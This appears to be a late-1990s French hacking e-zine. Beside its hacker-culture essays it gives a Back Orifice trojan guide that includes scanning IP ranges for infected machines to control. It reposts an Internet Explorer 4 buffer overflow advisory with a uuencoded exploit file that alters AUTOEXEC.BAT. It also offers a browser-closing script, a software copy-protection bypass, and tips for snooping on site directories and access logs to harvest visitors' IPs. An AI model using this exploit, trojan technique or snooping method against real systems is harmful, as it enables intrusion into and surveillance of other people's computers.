Avertissement: toutes les informations fournies sur cet E-mag sont à titres purement éducatif. Il vous est déconseillé de les utiliser sous peine d'amendes et poursuites judiciaires. Tous ce que vous ferez ne saurait m'en inquiéter et m'en rendre comme responsable! La libre diffusion de cet E-mag est autorisée à condition qu'elle soit dans un but informatif.
Le hacking est un phénomène qui touche
de plus en plus de gens partout dans le monde! De plus en plus de gens
sont intéressés par cet mentalité qu'est celle du
hacking... Nombre de personnes rêveraient de devenir hacker. Et nombre
de personnes se font une muvaise image du hacker en général.
Car en effet il faut différencier les types de pirates: Il y a:
· Les crashers: les crashers sont de dangeraux pirates
qui détruisent tout pour le plaisir... cette mentalité est
peut-être l'une des moins répandues, car il faut savoir que
les crashers sont très souvent haïs par le milieu du piratage.
A éviter donc.
· Les crackers: ils sont là pour cracker les programmes
(ex: enlever le passworrd d'un file en le désassemblant pour
le diffuser ensuite sur internet). Les crackers ne sont pas fondamentalement
dangereux. les très bons crackers sont de véritables génies
(il faut le dire) de la programmation. sans eux le réseau internet
ne serait pas ce qu'il est maintenant.
· Les lamers: en général ce sont les débutants
dans le milieu du piratage... Ce sont souvent les "bizus" des élites!
Si vous débutez dans le milieu du H/P/C/V (hacking, cracking, phreaking
etc...)essayez d'acquérir un certain niveau de connaissance seul...
en général les élites du dessus n'hésiteront
pas à vous filer un ou deux trojans entre quelques programmes. sauf
si c'est quelqu'un que vous connaissez bien ou qui est votre ami.
· Les phreakers: le phraker est un pirate du réseau
téléphonique en général... Mais il peut aussi
pirater sa borne EDF, graver des cd crackés etc... En général
les phreakers se mêlent rarement au milieu du hacking. Tout ce qui
concerne le piratage de la ligne téléphonique du voisin pour
se faire des minutes gratos ça les concerne!
· Les hackers: ce sont les pirates du net... Les
meilleurs du hacking sont quasiment inconnus. Jusqu'au jour ou ils pratent
le Pentagone et qu'ils se font choper! La moyenne d'âge des hackers
tourne entre 15 et 25 ans. Ils piratent n'importe quoi. Par simple défi.
Par pur plaisir. Les hackers s'attaquent rarement aux autres internautes!
Mais méfiez vous! Les hackers sont un peu crashers dans leur côté
obscur.
Donc c'est surtout des hackers dont nous parlerons. Il
faut savoir que les médias donnent une mauvaise image du hacking,
en faisant des articles diffamateurs ou en médiatisant le mauvais
côté du hacking. Les médias profitent de l'ignorance
que les gens ont sur le piratage pour détruire la VERITABLE image
du hacker! Sans les hackers allez savoir si votre réseau internet
existerait! Internet était au départ un réseau militaire.
Mais les universitaires et les scientifiques en ont fait le réseau
internet. Et pas les médias (qui font jamais bien leur boulot d'ailleurs
:-))! Des universitaires! Donc tout ça pour vous dire que ce que
les médias pourront vous raconter sur le piratage informatique ne
sera pas toujours juste. Mais si on a tendance a penser que un hacker est
un dangereux criminel, celui-ci aura tendance a se criminaliser; c'est
psychologique. Mais les hackers sont loins d'êtres tous dangereux...
certains hackent même pour prouver que aucun système de sécurité
ou sytèmes d'exploitation n'est infaillible. ce qui nous permet
de démontrer que Windows est une vrai "passoire" (pardonnez l'expression).
Ainsi on pourrait s'imaginer que certains trous de sécurité
sont volontaires. D'ailleurs Microsoft a fait en sorte que Money99 (qui
n'est pas encore officiellement sorti) ne marche que si Microsoft Intenet
Explorer 4 est installé! Les accusations qui se font au sujet de
Bill Gates, comme quoi son but serait de détenir tout le marché
de l'informatique, peuvent être considérées comme vrai!
Pas à 100%. Mais il faut avouer que Microsoft est ce qu'est Coca-Cola
par rapport à la grenadine. Les statistiques démontrent que
Microsoft détient environ + de 90% du marché informatique,
mais... pouvons nous incriminer Bill Gates? car si vous êtes pas
content y'a toujours Linux ou Unix! Et vous devez aussi avoir Netscape
Navigator sur votre bécane, non? Bref pour clore cette introduction
je tiens quand même à vous dire que, bien que les médias
arrangent les faits à leur manière, ceux-ci ne sont jamais
forcément erronés.
Ben... comment vous expliquer ça. Un hacker (je vais faire quand même un petit récapitulatif de ce qui a été vu plus haut), c'est un pirate qui essaie de découvrir les failles de chaque système, c'est quelqu'un qui créé des programmes de piratage etc..., par simple défi. Pas pour le fric (pas toujours: la tune tombe pas des arbres). Bref... Les hackers forment aussi une "communauté" ou l'on se doit d'être solidaire... Les hackers se tapent rarement dessus. Mais le hacking c'est aussi une mantalité. Une volonté. On ne se lance pas dans le hacking pour déconner. Non... En général on va jusqu'au bout. Rares sont ceux qui ont abandonné en cours de route. Il y a tellement de choses à découvrir dans le monde du piratage que cela revient à en découvrir un nouveau monde: l'autre côté de l'utilisation d'un ordinateur. Pas forcément le côté obscur de l'utilisation d'un ordinateur mais surtout les possibilités que ce côté peut nous offrir (si vous voyez ce que je veux dire!). Il faut savoir qu'il y a différents aspects dans le hacking! On peut facilement se les imaginer: études des différents systèmes de sécurité, création de programmes, piratage du pc d'un pauvre internaute etc... en général les très bons hackers sont appelés: Elite et sont quasiment inconnus! Si jamais vous en rencontrez un ou que vous avez judicieusement su en reconnaitre un, eh ben gardez ça pour vous. Rien de pire que de s'attirer des emmerdes, de toute la communauté hacker, qu'en dénoncant " un de l'élite". Mais un hacker c'est aussi une personne comme vous et moi! On ne doit pas s'imaginer que parce que une personne pirate elle se différencie forcément de la société dans laquelle vous vivez. Elle est contribuable, regarde la télé (Eh oui! Ca lui arrive!), dort dans un lit, etc... mais un hacker c'est aussi une personne aimable, courtoise et pas forcément belliqueuse! Loin de toutes les idées reçues ce serait plutôt le contraire: tendance pacifique. Mais bon... Y'a des exceptions hein! Faudrait pas s'faire des illusions! (on va finir par croire que je contredis ce que j'écris!)
Bon eh ben lui il m'a grave fait chier! Sauf que j'appris par la suite
que son copain c'était J (secret aussi), un de mes potes qui entre
deux nukers lui avait filé un trojan! Alors... ce mec si vous le
rencontrez et que vous reconnaissez sa manière de faire, n'hésitez
pas à lui "foutre un pain sur la gueule"! J'avais manqué
de tact ce jour là mais bon... De plus j'avais son tel. Il a passé
un sale quart d'heure! Il a plus recommence. Mais si je vous raconte cette
anectdote c'est pas pour rien. C'est pour vous démontrer que des
gros cons (pardonnez l'injure mais ça défoule) orgueuilleux
y'en a
partout! Revenons à nos moutons... J'ai souvent vu marqué
qu'un vrai hacker se devait d'avoir Linux (dans d'autres E-mags Unix),
si il voulait devenir un VRAI hacker... Mais pour en revenir à notre
premier E-mag (c.f. début chapitre), celui-ci disait: "vous devez
aoir Linux sinon c'est inutile d'essayer d'être hacker. Là
j'ai vomi :-). Comment peut-on dire des choses aussi absurdes! On peut
très bien être hacker et ne pas être sous Linux ou Unix!
Pourquoi pas sous Windows95 ou Windows98! Moi je suis sous Windows95 et
j'en suis fier! Bien que Linux n'est absolement pas négligeable
pour hacker! Mais de là à dire que c'est l'outil qu'on se
DOIT d'avoir, là non!!! Rien de plus faux! je le dis, je le répète!
Et je continuerais de le répéter! J'avais aussi remarqué
que les hackers (les bons et les débutants), mettaient souvent des
petits signes distinctifs, dans certains mots, tel que: Micro$oft ou transformait
des mots pour en faire des: zindaube, winfuke, microdobe, etc... Nous sommes
loin des critères débiles du E en 3 et du O en 0! Non...
Là ça a surout un caractère humouristique qui tient
à démontrer que l'on se moque bien de windows et de ses trous
de sécurité!
donc pour se démarquer de tous ces débiles qui prenne
ça à la légère! Je vais aborder un autre type
de personnes qui existent: les lamers (c.f.: chapitre1). Les lamers sont
loin d'être des gros cons... Au contraire. ce sont en général
des personnes qui débutent dans le milieu! Il n'est pas exclu de
les aider! Il sauront vous le rendre tôt ou tard! Les lamers disent
qu'ils aimeraient être hacker et demanderont au premier venu de leur
enseigner pour peu que celui-ci s'y connaisse un peu. c'est pourquoi, vous
recevrez souvent des messages de lamers qui vous demanderont de leur apprendre
le hacking. Evitez de les envoyer balader! Il vous on rien fait ;-). Vous
aussi vous avez été lamers au tout début de votre
période! Vous aussi vous avez demandé à des gens de
vous apprendre! Alors??? Bref... Essayez de vous démarquer des blaireaux
sans pour autant ne pas vous amuser à glisser un petit Zindaube
dans la conversation :-)!!! (Non. en fait je dis ça car j'aimais
pas trop qu'on m'envoie promener au début de mon apprentissage!)
Donc voilà comment se présente votre fenêtre
NOBO qui s'ouvrira automatiquement au premier ping. En général
1/3 des personnes qui utilise BO sont elles même infectées!
Maintenant il vous gaudra savoir ou télécharger BO120.zip.
L'url du site de cDc (où est en téléchargement BO)
est: http://www.cultdeadcow.com/tools/bo.html. Mais revenons à nos
moyens de détection de BO!
(La suite de ce texte est vaguement inspiré du Pirates MAG'
N°2). Bon ce qu'il faut savoir: (et ça c'est moé qui
le dit). Il existe une commande netstat que l'on peut faire sous dos. Cette
commande permet de surveiller les ports actifs de votre bécane!
Vous allez voir le rapport entre ça et BO! Je m'explique: on peut
trouver des quantités de programmes censés détecter
et détruire Back Orifice. Mais la pluspart du temps, ces logiciels
ne peuvent que détecter la version de base avec sa configuration
par défaut (port 31337, pas de mot de passe), ou encore que dalle,
ou encore vous filer BOSERVE comme BOSNIFFER. ceci est insuffisant et dangereux:
on peut se croire faussement protégé. N'espérez pas
détecter la présence d'un serveur (=trojan) sur votre pc
en utilisant seulement le client, car, là encore, il faut connaitre
le numéro de port par lequel le serveur communique avec le client
(programme qui permet de pénétrer votr pc). Il faut savoir
que BO peut communiquer avec le client sur tous les ports possibles. De
ce fait, une recherche exhaustive va prendre environ une dizaine de minutes.
Ce laps de temps est largement suffisant pour qu'un pirate fasse ce qu'il
veut de la machine cible. des anti-virus, comme Norton, déclarent
dans leur dernière version de pouvoir détecter BO avant même
son installation... Oui, mais il ne leur est pas possible de détecter
toutes les variantes, pour la bonne et simple raison qu'il en apparaît
sans cesse. Et ) propos de virus, rien n'empêche de compbner la posssibilité
d'autoreplication d'un virus avec BO (le truc qui fait mal aux dents!).
En fait la façon la plus simple de surveiller l'état des
connexions Réseau d'un pc est la commande NETSTAT. Elle permettra
de savoir tout ce qui entre ou sort de la machine sur laquelle elle est
lancée. Supposons que nous ayons affaire à un BO de base
avec ses options par défaut (port 31337). si vous tapez dans ue
fenêtre Dos: netstat -an I find "UDP", vous obtiendrez: UDP 0.0.0.0:31337,
ceci indique qu'une application est en train découter tout ce qui
arrive sur le port 31337, on peut donc avoir un gros soupçon!!!
Eventuellement, le propriétaire du pc pourra détecter une
activité suspecte (BO communiquant avec le client). Mais attention:
le pirate peut aussi très bien remplacer NETSTAT.exe par une
version qui ne le trahira point ou même plus vicieux: incorporer
le serveur (boserve) à NETSTAT! Ah oui, un dernier détail
pour achever de vous faire froid dans le dos: rien n'empêche que
plusieurs versions de BO tournent en même temps sur votre machine.
Et puisqu'il ne serait pas juste que seules les victimes potentielles aient
peur: sachez chers utilisateurs de BO, que toutes les données récupérées
par le client sont envoyées vers l'adresse IP 209.25.3.113: vous
êtes donc surveillés. de plus l'utilisation de BO est formellement
interdite par la loi et saurait être passible de poursuites judiciaires.
Vous voilà prévenus.
Bon maintenant parlons de Back Orifice et de son utilisation. Si vous cherchez bien sur le net vous trouverez facilement des: "comment télécharger BO, télécharger BO ici et maintenant, la vraie version de BO en téléchargement, etc...". Mais méfiez vous des contrefaçons! Qu'est ce qui vous garantit que votre cher BO en téléchargement n'est pas un virus ou boserve (qui est le trojan)? Ben va falloir apprendre à distinguer les vraies versions des fausses! Si vous télécharger BO sur le net il faut savoir que le zip s'appelle: bo120.zip, sinon vous virez! BO est trop dangereux pour qu'on prenne ça à la légère! Le zip de Back Orifice fait 278 ko. Et voilà comment se présente la fenêtre de décompression de BO:
Alors ici on remarque plusieurs sortes de programmes: bogui, boserve, boclient etc... Tout vous sera expliqué dans la notice du nom de "bo.txt". IL NE FAUT SURTOUT PAS EXECUTER BOSERVE (je me répète mais on est jamais trop prudent!). Si vous ne le savez toujours pas: boserve est le trojan, plus couramment sous le nom qu'on donne au terme général de "trojan", c'est le serveur. Bogui et boclient sont les programmes qui communiquent avec le serveur, appelés plus couramment clients. les autres programmes sont moins importants. Si vous connaissez une personne infectée par le serveur alors éxécutez bogui et rentrer son IP, puis faites: ping host. Si la personne répond à l'autre bout un message : "!PONG!"+ le nom de l'utilisateur s'affichera sur votre fenêtre bogui. Mais comment savoir si c'est bien bogui que vous regardez? Simple bogui resssemble à ceci une fois éxécuté:
Donc si c'est ce que vous voyez, plus de dute, vous avez bien
la bonne version! Je vous passe les détails d'utilisation de BO
car tout vous sera expliqué dans la doc. Mais sachez que vous pouvez
scanner tous les gens dont l'IP commence par un certain nombre (là
c'est confus et je m'explique). Imaginez que vous ayez personne à
pinger. Le meilleur moyen de ping et d'avoir plus de chnaces de tomber
sur des personnes infectées et de rentrer dans "target:host port
cet IP (par exemple): 193.193.*.* bogui s'amusera alors à scanner
tous les IP commençant par: 193.193 ce qui vous donne une grande
marge. Mais le scanne sera long il sera plus utile de faire: 193.193.193.*,
vous avez moins de chances de trouver d'infectés mais le scann se
fera plus vite. Bogui scane le port par défaut (c'est à dire
31337). Seules les personnes infectées sur ce port répondront
par PONG. Mais si vous scannez toute une série d'IP en faisant *.*
et que dans cette série se trouve un IP d'utilisateur qui possède
NOBO, alors la personne usant de NOBO aura votre IP et vous verrez un message
s'afficher dans la partie d'écrit. Il faut savor que de plus en
plus de gens ont NOBO; ce qui n'a pas pour but de faciliter l'utilisation
de BO.
========
Scenario
========
The Microsoft Internet Explorer 4.0 Suite, including
all programs supplied
with it that read and/or process HTML from either
local machines, intranet
machines, or remote internet machines are subject
to a buffer overflow in the
HTML decoding process. The buffer overflow can
cause the application to page
fault, or in the worst case, execute arbitrary
precompiled native code.
=======
Example
=======
1. Copy the supplied HTML file(s) into a location
that is accessible via the
target application.
2. Point to it. Look at it.
3. Click on the link. (or let someone click it
for you)
4. Become aware of what happens to your machine.
5. Freak out and beg Microsoft to make the bad
man stop.
=================
Technical Details
=================
The problem here lies in the deciphering of the
URL line format itself. The
base HTML library that is used by the Internet
Explorer 4.0 Suite and the
following programs are vulnerable:
- Outlook Express
(both mail and news)
- Windows
Explorer
- Internet
Explorer (different than regular explorer, really)
This problem, because it stems from a programming
flaw in the HTML decoding
system, is unaffected by the Explorer "Security
Zones" feature. In other
words, if you turn on the highest security level
for the zone from where the
exploit HTML is being viewed, you are still vulnerable.
The critical problem here is a buffer overflow
in the parsing of a particular
new type of URL protocol. The "res://" type of
URL is meant to allow access
to a local resource embedded in a local DLL file.
This is useful for
archiving entire websites into a DLL and is not,
in its truest concept, a
security flaw.
For example, to read something out of the IE4.0
Tour (stored in a DLL) try
the following URL: res://ie4tour.dll/page1-6.htm
The buffer overflow is on the actual filename specified.
To crash your
machine go ahead and try res://blahblahblah ...
blahblah/ in your Internet
Explorer window where the amount of 'blah' equals
265 characters.
The function that goes through the filename and
validates it is flawed on
Windows 95. Without checking the length, the filename
is uppercased,
concatenated with '.DLL' if it isn't there already,
and in the process,
copied into a fixed size buffer.
========
Solution
========
Currently, there is no solution available for this
flaw. You can't set any
Internet Explorer options to avoid it, and you
are not protected by any
level of zone security. Simply don't surf the
web, read email or view
net news using Internet Explorer 4.0 until Microsoft
puts up a hotfix.
============
Exploit Code
============
Here we go...
When constructing the exploit we want
to try something useful.
Lets's start with appending text of
your choice to AUTOEXEC.BAT...
(note that running native code lets
you do pretty much anything you want)
Note that the location of the exploit
string in the stack is very important
and it varies from target application
to target application.
Constructing the exploit string:
Figure out stack location for exploit
code...
App
Loc
Internet Explorer
0x0057C144
Windows Explorer
0x0088A0F4
...
Yeah, I know that those locations have
null bytes in them and you can't
put those (or lowercase letters, or
CR/LF or 0x07 or anything like that)
in the exploit string... but we'll
let microsoft fix that for us. Step thru
the process to see IE add that extra
null character for you. Will they
ever cease to amaze...
Put together what you wanna do, tack
on the necessary jump addresses and
all that. That's it.
And now, UUENCODED to preserve freshness:
*************************************************************************
* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER,
_NOT_ *
* REGULAR OL' WINDOWS EXPLORER. (put it on a website
and download it or *
* click on the IE desktop icon (run iexplore.exe) and
type in the name *
* of the file into the URL line) IT WON'T WORK
OTHERWISE!!!!
*
*
(though it could be made to do so) *
*************************************************************************
----====/ SNIP
section 1 of uuencode 5.20 of file infect.htm by R.E.M.
begin 644 infect.htm
M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T*
M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT
M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@
M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE&5C+F)A=#QP/@T*#0H\82!H_@.^`
_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0
M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O
M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@
M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0
M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\-
M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\
M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S
M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D
->3X-"CPO:'1M;#X-"CX-
`
end
sum -r/size 62455/917 section (from "begin" to "end")
sum -r/size 5779/643 entire input file
/====---- SNIP
A haiku:
Microsoft IE
Is there no security?
Not if you ask me.
dildog@l0pht.com (11/1/97)
- Vous faîtes des pages HTML pour votre site
internet? ce script est à installer au début:
<BODY>
<script language='JavaScript'>
function closeit()
{
if (navigator.appName == "Microsoft Internet Explorer")
self.close()
}
</script>
Tout navigateur de type Microdoft Internet Explorer qui digère
le javascript sera automatiquement fermé.
-(source: Pirates Mag) J'utilise le programme MS WORKS 1.05 en version française pour Dos. Malheureusement, suite à plusieurs plantages disques dus aux applications utilisées, j'ai du réinstaller à chaque fois ce programme. Aujourd'hui le compteur est à zéro et je ne peuc plus rien faire. Pire, Microsoft ne peut (ou ne veut) rien faire pour moi. Avez vous une solution? Anonyme.
La position de Microsoft est déplorable.
Et comme nous n'avons pas pu non plus obtenir plus d'informations de la
part du support technique, nous vous proposons notre propre solution que
nous avons trouvée en éxaminant votre disquette. Sous Dos,
copiez l'intégralité de la disquette dans le répertoire
de votre choix avec la commande XCOPY A: nom_répertoire
(répondre par oui aux questions posées).
Allez dans ce répertoire en tapant
nom_répertoire Tapez maintenant les
commandes suivantes:
MD ^~
ATTRIB +R +H ^~
MD _~
ATTRIB + R+H _~
Works peut maintenant fonctionner à partir de votre disque dur!
Si vous voulez l'effacer, tapez:
ATTRIB -R -H ^~
RD ^~
ATTRIB -R -H _~
RD _~
- Vous
naviguez sur le net, quand soudain vous voyez un site dont l'url est: (je
dis n'importe quoi mais c'est pour un exemple) http://www.multimania.com/08/tioto/info/user/index.htm.
A première vue cela ressemble à un url comme un autre un
peu long, mais des url long y'en a partout, me direz-vous! Eh ben, petite
astuce si le mec se débrouille pas trop bien pour faire ses pages:
vous remettez l'url en retirant à chaque fois un segment ce qui
donnera http://www.multimania.com/08/tioto/info/user/ et vous tapez:
enter... soit le navigateur affiche: erreur ,soit il affiche accès
interdit, soit il vous met à une page html, ou bien encore (et c'est
là que ça nous intéresse) il vous mets des répertoires.
Des répertoires? Oui... En faisant cette manip vous avez environ
1/3 ou un 1/4 des sites qui vous mettront tout ce qui est passé
en ftp. C'est à dire même des images non visibles sur le site,
ou des liens que l'on ne voit pas sur le site, etc... Imaginez que vous
tombez sur un site cochon qui n'en a pas l'air! Hein? Mais si la manip
marche pas continuez à retirer des segments jusqu'à arriver
au serveur!
- Accéder au compte ftp d'un site: prenons l'exemple d'un site quelconque! Je prends: http://www.hackers.com qui est un site vachement merdique. En allant sur son compte ftp par cet url: ftp://www.hacker.com on a: Current directory is /
bin/
Wed Oct 30 00:00:00 1996 Directory
pub/
Tue Jun 3 00:00:00 1997 Directory
alors on évolue en cliquant sur pub et
on trouve des trucs de hack! Ce que le site lui même ne laisse pas
paraître! cela donne:
Current directory is /pub
Up to higher level directory
acrobat/
Tue Dec 17 00:00:00 1996 Directory
doc/
Mon Oct 10 00:00:00 1994 Directory
mac/
Fri Jul 25 00:00:00 1997 Directory
msdos/
Mon Mar 4 00:00:00 1996 Directory
phoenix/
Thu Jan 19 00:00:00 1995 Directory
text_files/
Thu Dec 22 00:00:00 1994 Directory
users/
Sat Nov 14 01:20:00 1998 Directory
windows/
Tue Jun 3 00:00:00 1997 Directory
et si on va dans msdos on a:
Current directory is /pub/msdos
Up to higher level directory
compress/
Thu Aug 21 00:00:00 1997 Directory
games/
Mon Mar 4 00:00:00 1996 Directory
term_progs/
Tue Nov 1 00:00:00 1994 Directory
uuencode/
Thu Sep 8 00:00:00 1994 Directory
Qui ne sont autres que des répertoires de hack!
Voyez donc l'utilisation que vous pouvez faire de cet astuce! Intéressant non?
- Accéder aux statistiques d'un site: il y a très
peu de sites ou vous pourrez accéder aux statistiques. Tapez (c'est
un exemple): http://www.xxxxxx.com/stats Vous atterrirez sur une page avec
les statistiques du site qui se présente comme ça:
Index of /stats
Name
Last modified Size Description
Parent Directory
23-Sep-98 16:48 -
DailyHitStats.gif
07-Nov-98 02:02 3k
DailyVolumeStats.gif 07-Nov-98 02:02
4k
HourlyHitStats.gif 07-Nov-98
02:02 4k
HourlyVolumeStats.gif 07-Nov-98 02:02
4k
TopLevelDomainHitStat..07-Nov-98 02:02
2k
TopLevelDomainVolumeS..07-Nov-98 02:02
2k
TopNDomainsHitStats.gif07-Nov-98 02:02
3k
TopNDomainsVolumeStat..07-Nov-98 02:02
3k
TopNFilesHitStats.gif 07-Nov-98 02:02
4k
TopNFilesVolumeStats...07-Nov-98 02:02
4k
access_log
07-Nov-98 19:13 4k
error_log
15-Oct-98 19:16 5k
graph.html
07-Nov-98 02:02 4k
httpstats.html
07-Nov-98 02:02 9k
stats-xxxx-98_Aug.ta..01-Sep-98 05:32
1k
stats-xxxx-98_Jul.ta..01-Aug-98 05:30
1k
stats-xxxx-98_Jun.ta..01-Jul-98 05:32
1k
stats-xxxx-98_Oct.ta..01-Nov-98 05:33
1k
stats-xxxx-98_Sep.ta..01-Oct-98 05:33
1k
Je garde le nom secret pour pas qu'il y ait de petits malins
qui viennent envahir les stats d'un site. En fait celui-ci je me le garde
;-). Maintenant vous tapez: http://www.xxxx.com/stats/access_log, et vous
obtenez:
web4.infonie.fr - - [05/Nov/1998:10:32:18 +0100] "GET / HTTP/1.0" 200
3767
web4.infonie.fr - - [05/Nov/1998:10:32:19 +0100] "GET /probate2.jpg
HTTP/1.0" 200 706
web4.infonie.fr - - [05/Nov/1998:10:32:20 +0100] "GET /soiseau.gif
HTTP/1.0" 200 2333
web4.infonie.fr - - [05/Nov/1998:10:32:20 +0100] "GET /pismo.jpg HTTP/1.0"
200 1272
web4.infonie.fr - - [05/Nov/1998:10:32:21 +0100] "GET /ilogofi.gif
HTTP/1.0" 200 3645
web4.infonie.fr - - [05/Nov/1998:10:32:32 +0100] "GET /devis.htm HTTP/1.0"
200 5558
195.68.45.51 - - [06/Nov/1998:15:15:53 +0100] "GET / HTTP/1.0" 200
3767
195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /ilogofi.gif HTTP/1.0"
200 3645
195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /probate2.jpg HTTP/1.0"
200 706
195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /pismo.jpg HTTP/1.0"
200 1272
195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /soiseau.gif HTTP/1.0"
200 2333
195.68.45.12 - - [06/Nov/1998:15:35:46 +0100] "GET / HTTP/1.0" 200
3767
195.68.45.12 - - [06/Nov/1998:15:35:46 +0100] "GET /ilogofi.gif HTTP/1.0"
200 3645
195.68.45.12 - - [06/Nov/1998:15:35:47 +0100] "GET /probate2.jpg HTTP/1.0"
200 706
195.68.45.12 - - [06/Nov/1998:15:35:47 +0100] "GET /pismo.jpg HTTP/1.0"
200 1272
195.68.45.12 - - [06/Nov/1998:15:35:47 +0100] "GET /soiseau.gif HTTP/1.0"
200 2333
195.68.45.12 - - [06/Nov/1998:15:36:26 +0100] "GET /service.htm HTTP/1.0"
200 2004
195.68.45.12 - - [06/Nov/1998:15:36:26 +0100] "GET /ibuton.gif HTTP/1.0"
200 1113
195.68.45.12 - - [06/Nov/1998:15:36:41 +0100] "GET /devis.htm HTTP/1.0"
200 5558
195.68.45.12 - - [06/Nov/1998:15:37:23 +0100] "GET /index.htm HTTP/1.0"
200 3767
193.252.201.13 - - [07/Nov/1998:01:31:22 +0100] "GET / HTTP/1.1" 200
3767
193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /soiseau.gif HTTP/1.1"
200 2333
193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /probate2.jpg
HTTP/1.1" 200 706
193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /pismo.jpg HTTP/1.1"
200 1272
193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /ilogofi.gif HTTP/1.1"
200 3645
zanussi.netcraft.co.uk - - [07/Nov/1998:10:26:41 +0100] "HEAD / HTTP/1.1"
200 0
troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:15 +0100] "GET / HTTP/1.1"
200 3767
troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:16 +0100] "GET /soiseau.gif
HTTP/1.1" 200 2333
troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:16 +0100] "GET /probate2.jpg
HTTP/1.1" 200 706
troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:17 +0100] "GET /pismo.jpg
HTTP/1.1" 200 1272
troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:18 +0100] "GET /ilogofi.gif
HTTP/1.1" 200 3645
troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:51 +0100] "GET /service.htm
HTTP/1.1" 200 2004
troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:52 +0100] "GET /ibuton.gif
HTTP/1.1" 200 1113
troy3-86.abo.wanadoo.fr
(J'ai raccourci en ne laissant que 2 ou 3 exemples sinon cet E-mag
serait 2 fois plus gros que maintenant)
Vous obtiendrez ici soit l'IP de la personne soit des infos sur elle.
Comme troy3-86.abo.wanadoo.fr, et si vous avez un tracer d'ip comme WSPINGPR
alors vous aurez l'ip de la personne.
Mais si on prend un accès protégé, voilà
ce que ça donne, l'url étant: http://www.baguette.com/stats:
le navigateur affiche un écran pour login et password.
J'ai fait annuler et voilà ce que ça a donné:
Authorization Required
This server could not verify that you are authorized to access the document
you requested. Either
you supplied the wrong credentials (e.g., bad password), or your browser
doesn't understand how
to supply the credentials required.
C'est tout ce que je peux vous dire sur les statistiques d'un site.
- Le registre d'adresses contient 16 bits pour coder
64 ko, soit 65 536 (2^20 (2 exposant 20)
= 1 048 567). Mais les composants ne permettaient pas d'utiliser complètement
deux registres d'adresse. Du coup, voilà comment votre ordinateur
calcule une adresse en mémoire. Il possède quand même
deux registres d'adresses de 16 bits. L'un correspond au segment, l'autre
à l'offset. Une adresse est un couple segment/offset. Le calcul
de l'adresse se fait en opérant un décalage de 4 bits vers
la gauche su registre de segment puis d'une addition binaire avec le registre
offset. Le résultat est sur 20 bits et permet d'adresser 1Mo. Cette
technique, si elle aboutit au résultat voulue, est d'un grand gâchis.
Beaucoup d'adresses se recouvrent, elles sont accessibles par plusieurs
couples de segment/offset. Ainsi les valeurs (notation segment:offset)
2 :0, 1: 16, 0:32 aboutissent toutes à la case d'adresse 32.
2) D'après le BSA, la France est le pays qui connaît le taux de piratage le plus élevé d'Europe. Il serait parvenu à 44 % en 1996. Le BSA ayant un grand coeur, c'est bien connu, souhaiterait faire baisser ce pourcentage à un niveau considérable, soit passer sous le seuil des 27 % d'ici l'an 2001. Toujours d'aprrès la boule de cristal du BSA, cette baisse permettrait de créer 260 000 nouveaux emplois. Mais ont-ils compté les pirates qui perdraient leur boulot?
3) 2 jeunes hackers anglais âgés de 17 et 18 ans, membres de milw0rm, ont pu accéder illégalement au système informatique du Barc, le centre de recherche de Bhabha responsable des essais nucléaires en Inde, au mois de mai 98 dernier. Les pirates ont modifié la page d'accueuil du site informatique du centre de recherche et auraient réussi à voler les courriers électroniques des savants, avant et après les essais. Désamorcer des bombes par des mail-bombers, fallait y penser!
4) Le président du commissariat indien à l'énergie atomique (AEC) R.Chidambaram, a nié que son pays ait été victime d'un acte de "piraterie informatique" fin mai, à l'encontre du centre de recherche Bhabha (Barc) responsable des essais nuvléaires indiens qui ont bien failli déclencher une guerre en Asie du Sud-Est. "Non c'est absurde. Ils n'ont rien obtenu!", a-t-il déclaré. Absurde? Pour nous l'absurde, c'est plutôt un mec qui dépense des millions de dollars pour faire péter des bombes au lieu de nourrir un peuple qui crève de faim.
5) Anastasia, Barbara, Marilyn, Cindy, tant de rencontres sur le net! Mais attention, la rencontre réelle est parfois décevante. C'est l'histoire d'un Hollandais qui descendait d'un avion dans le New Hampshire avec un poireau à la main (vous avez mieux pour vous reconnaître?). Il devait rencontrer un jeune garçon avec lequel il avait conversé sur le net. Comme cadeau de bienvenue, il reçut des bracelets aux poignets. Le jeune ami était en réalité un agent du FBI (Mulder est dans le coup!).
